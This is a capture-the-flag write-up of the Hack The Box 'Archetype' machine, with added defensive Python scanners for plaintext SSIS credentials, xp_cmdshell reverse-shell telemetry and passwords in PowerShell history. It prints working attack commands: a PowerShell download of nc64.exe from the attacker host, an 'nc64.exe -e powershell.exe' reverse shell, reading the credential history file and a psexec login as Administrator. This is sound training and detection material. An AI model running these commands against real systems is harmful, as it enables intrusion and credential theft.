HTB Notes: Archetype

William Ma

SMB

Scanning the machine we find the following services running:

  1. SMB (445)

  2. SQL Server (1433)

We can list the shares or services by using the following command.

smbclient -L //10.129.227.227 --user=Administrator

This works because the SMB server is misconfigured and accepts a blank password for the Administrator account. The following command, which sends no password at all, also works.

smbclient --no-pass -L //10.129.227.227

We find a share that we can access via smbclient --no-pass //10.129.227.227/backups. In it we find the prod.dtsConfig file and copy it over to our local machine.

On reading this configuration file, we find a user's credentials in plaintext: the username (sql_svc) and the password.
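A defender-side check for this finding, added here as an example (it is not code from the writeup or from any tool it mentions): a small scanner that parses a .dtsConfig file, splits each ConfiguredValue as a connection string and reports the entries that carry a plaintext Password or Pwd, masking the secret so the report does not leak it again. The sample file below is constructed to match the shape of an SSIS configuration file; its values are placeholders, not the ones from the box.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like an SSIS .dtsConfig package configuration file.
# The credential values are placeholders (this is not the file from the box).
SAMPLE_DTSCONFIG = """<?xml version="1.0"?>
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="example" GeneratedFromPackageName="Package"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=PLACEHOLDER_PASSWORD;User ID=sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Variables[User::Timeout].Properties[Value]" ValueType="Int32">
    <ConfiguredValue>30</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

SECRET_KEYS = ("password", "pwd")


def parse_connection_string(value):
    """Split an ADO/OLE DB style 'Key=Value;Key=Value' string into a dict (keys lower-cased)."""
    pairs = {}
    for part in value.split(";"):
        key, sep, val = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = val.strip()
    return pairs


def mask(secret):
    """Keep the first character so two findings can be told apart, hide the rest."""
    return secret[:1] + "*" * (len(secret) - 1)


def find_plaintext_credentials(xml_text):
    """Return one finding per <Configuration> whose ConfiguredValue carries a password."""
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        pairs = parse_connection_string(node.text)
        secret_key = next((k for k in SECRET_KEYS if pairs.get(k)), None)
        if secret_key is None:
            continue  # plain value such as "30": nothing to report
        findings.append({
            "path": conf.get("Path", ""),
            "user": pairs.get("user id") or pairs.get("uid") or "",
            "secret_key": secret_key,
            "masked": mask(pairs[secret_key]),
            # Persist Security Info=True keeps the password inside the connection
            # object after it opens, so it can also be read back at runtime.
            "persist_security_info": pairs.get("persist security info", "").lower() == "true",
        })
    return findings


if __name__ == "__main__":
    for f in find_plaintext_credentials(SAMPLE_DTSCONFIG):
        print(f"{f['path']}: user={f['user']} {f['secret_key']}={f['masked']} "
              f"persist_security_info={f['persist_security_info']}")
```

Run it over every .dtsConfig exposed on a share (or committed to a repository) and the output is the list of accounts whose passwords need rotating; the fix on the SSIS side is to keep the connection string's password out of the file, for example by using Windows authentication for the package's connections or by holding the secret in a protected configuration store.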

SQL Server

We can connect to the SQL Server using mssqlclient.py from the Impacket collection.

There's a command to turn on xp_cmdshell.

We can run Windows shell commands via xp_cmdshell such as whoami and dir.

We can see that the machine has PowerShell by running xp_cmdshell powershell -c pwd. This makes our life much easier, as we'll see later, because PowerShell gives us wget (an alias for Invoke-WebRequest) to download files.

Reverse shell

Now that we're able to run shell commands, we can get a reverse shell.

  1. We download nc64.exe, with the intention of getting our target to download and run it. Using netcat to create a stable reverse shell is much easier than using shell code found on the internet.

  2. We run our web server on port 80 using python3 -m http.server 80

  3. We run our netcat listener on port 8001 using nc -lvnp 8001

  4. We get our target to download nc64.exe, via xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.19/nc64.exe -outfile nc64.exe". We need to find a directory where we have permissions to save a file, C:\Users\sql_svc\Downloads works.

  5. We then get our target to connect to us, thereby creating a reverse shell. xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e powershell.exe 10.10.14.19 8001"
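From the blue-team side, the chain above leaves a distinctive trace in process-creation telemetry: sqlservr.exe spawning cmd.exe or powershell.exe (the shape every xp_cmdshell call takes), a PowerShell command line that fetches a file over HTTP, and a netcat-style binary launched with -e. The block below is an added example, not code from the writeup or from any tool it mentions, that encodes those three observations as rules and runs them over constructed Sysmon Event ID 1 style records (made up for this example; the IPs are the ones used in the writeup, and the SQL Server install path is an assumed one).

```python
import ntpath
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1
# (ParentImage / Image / CommandLine). They are made up for this example,
# not telemetry captured from the box; the SQL Server path is an assumed one.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.19/nc64.exe -outfile nc64.exe"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\sql_svc\Downloads\nc64.exe",
     "CommandLine": r".\nc64.exe -e powershell.exe 10.10.14.19 8001"},
]

SQL_SERVER_IMAGE = "sqlservr.exe"
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell download cradles: the alias or cmdlet followed somewhere by a URL.
CRADLE_RE = re.compile(
    r"\b(?:wget|curl|iwr|invoke-webrequest|downloadstring|downloadfile)\b.*https?://", re.I)
# Netcat-style binary asked to attach a program to the connection (-e).
NETCAT_EXEC_RE = re.compile(r"\bnc(?:64)?\.exe\b.*\s-e\s", re.I)


def classify_event(event):
    """Return the list of rule names that fire for one process-creation record."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    cmdline = event["CommandLine"]
    hits = []
    if parent == SQL_SERVER_IMAGE and image in SHELL_IMAGES:
        hits.append("sql-server-spawned-shell")  # how an xp_cmdshell call shows up
    if CRADLE_RE.search(cmdline):
        hits.append("download-cradle")
    if NETCAT_EXEC_RE.search(cmdline):
        hits.append("netcat-exec")
    return hits


def scan_events(events):
    """Return (index, hits) for every record that matched at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = classify_event(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan_events(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)} <- {SAMPLE_EVENTS[index]['CommandLine']}")
```

The first rule is the high-signal one: on a server where SQL Server has no business launching shells it should fire essentially never, and xp_cmdshell is disabled by default, so its sp_configure state is also worth alerting on. The other two rules are noisier on their own (administrators do use wget) but are strong when they appear in the same process tree.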

Now that we've got the reverse shell on the user's machine, we can easily find the user flag.

Privilege Escalation

We use a similar trick mentioned above, except this time we download winPEAS and host it on our web server. Using our reverse shell we download winPEAS in the Downloads folder on the target's machine.

wget http://10.10.14.19/winPEASx64.exe -outfile winPEASx64.exe

Now we can run .\winPEASx64.exe.

There's a lot of output on all the potential ways you could escalate your privileges on this Windows machine, but we'll focus on one easy way.

We take a look inside the PowerShell history file, which stores previously run PowerShell commands.

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

We find the Administrator password in there: it was passed on the command line in a previous command used to connect to a network resource. Now we can connect to the Windows machine as Administrator using psexec.py, another tool from Impacket.

psexec.py Administrator@10.129.227.227
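The same history file is something a defender should be auditing before an attacker reads it. The block below is an added example (not code from the writeup or from any tool it mentions) that scans ConsoleHost_history.txt contents for the ways a password ends up on a PowerShell command line (net use with an inline password, a -Password parameter, ConvertTo-SecureString -AsPlainText), reports the line and command with the secret masked, and skips the case where the token after /user:NAME is just another switch. The history below is constructed and every secret in it is a placeholder.

```python
import re

# Constructed ConsoleHost_history.txt contents (not the real file from the box);
# every secret is a placeholder string.
SAMPLE_HISTORY = r"""Get-ChildItem C:\Users\sql_svc\Downloads
net.exe use T: \\backupserver\backups /user:administrator PLACEHOLDER_ADMIN_PW
net use S: \\fileserver\share /user:svc_backup /persistent:yes
$cred = Get-Credential
Invoke-Sqlcmd -ServerInstance . -Username sql_svc -Password PLACEHOLDER_SQL_PW -Query "SELECT 1"
$s = ConvertTo-SecureString "PLACEHOLDER_STR" -AsPlainText -Force
exit
"""

# A value is a double-quoted, single-quoted or bare token; exactly one group is set.
VALUE = r"""(?:"([^"]*)"|'([^']*)'|(\S+))"""
PATTERNS = [
    ("net use with inline password", re.compile(r"/user:\S+\s+" + VALUE, re.I)),
    ("-Password parameter", re.compile(r"-Password\s+" + VALUE, re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+" + VALUE + r"\s+-AsPlainText", re.I)),
]


def mask(secret):
    """Keep the first character so findings can be told apart, hide the rest."""
    return secret[:1] + "*" * (len(secret) - 1)


def audit_history(text):
    """Return one finding per history line that carries a credential on the command line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            secret = next(g for g in match.groups() if g is not None)
            # The token after /user:NAME may be another switch or "*" (prompt), not a password.
            if secret.startswith(("/", "-", "*")):
                continue
            findings.append({"line": lineno, "kind": kind,
                             "command": line.split()[0], "secret": mask(secret)})
    return findings


if __name__ == "__main__":
    for f in audit_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['kind']} in '{f['command']}' -> {f['secret']}")
```

Every finding is a credential to rotate, not just a line to delete, because the history file may already have been copied. To stop the file collecting secrets in the first place, PSReadLine can be told not to persist history at all (Set-PSReadLineOption -HistorySaveStyle SaveNothing); PSReadLine 2.1 and later also skip lines containing words such as password or -AsPlainText by default, but a net use line with the password as a bare argument is not caught by that filter, which is why the scan above checks it explicitly.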

Reflection

This machine highlighted the importance of:

  1. Disabling passwordless login

  2. Not storing user credentials in config files

  3. Not using passwords in command line arguments

  4. Restricting privileges in SQL Server

It's interesting to see all the different paths an attacker could take to gain access to a target machine.

Written by

William Ma, Software Engineer based in Sydney, Australia